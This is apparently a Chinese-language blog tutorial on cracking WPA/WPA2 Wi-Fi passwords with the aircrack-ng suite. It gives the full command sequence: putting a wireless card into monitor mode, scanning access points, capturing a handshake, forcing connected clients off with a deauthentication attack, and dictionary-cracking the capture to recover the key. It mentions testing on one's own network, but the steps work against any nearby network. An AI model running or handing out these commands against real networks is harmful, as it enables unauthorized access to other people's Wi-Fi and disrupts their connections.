在网上查找一番得知aircrack-ng这个软件,用这个软件最好是在linux,成功率也高,没有装linux的可以下载backtrack或者kali之类的LIVECD刻盘或者写入启动U盘。
下面开始进入正题:
11111 打开一个终端,切换到root用户,先用
複製代碼
ifconfig
查看下无线网卡,一般是wlan0 wlan1这样的名字
然后执行这条命令进入网卡的监听模式
複製代碼
airmon-ng start wlan0
我的电脑执行这条命令后wlan0网卡变成了wlan0mon。
22222 执行以下命令扫描AP
複製代碼
airodump-ng wlan0mon
然后你会看到类似下面的内容
複製代碼
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
选一个PWR绝对值小一点的,记下BSSID和CH
33333 执行以下命令收集WPA/WPA2握手包
複製代碼
airodump-ng -w /tmp/wpatest -c 11 –bssid 00:E0:4C:81:96:D1 wlan0mon
-c 后面的11就是CH
–bssid后面的是BSSID
执行这条命令后注意看第一行的右边
複製代碼
CH 11 ][ Elapsed: 1 min ][ 2015-01-21 04:00 ][ WPA handshake:
刚执行的时候你是看不到WPA handshake这两个单词的,这两个单词代表你已经抓到WPA/WPA2握手包了
要怎么抓到这个握手包呢?一种办法是等,等人联这个AP的时候就能抓到,或者攻击在线的客户端让它掉线重联。
开另一个终端用下面这条命令攻击
複製代碼
aireplay-ng -0 10 -a AP’s MAC wlan0mon
-a后面跟BSSID
如果有客户端在线一般攻击一两次就能抓到WPA包
44444 抓到WPA包之后用这条命令破解
複製代碼
aircrack-ng -w password.lst /tmp/wpatest*.cap
password.lst就是密码字典,就是一个文本文件,里面一行一条密码,各位可以自己随便建一个文件把自己的WIFI密码放进去,然后随便編几个密码测试能不能破解,一般就是几秒的事。
执行这条命令之后看中间Current passphrase的位置,破解成功会有KEY FOUND 然后后面跟着破解出来的密码。
评论(0)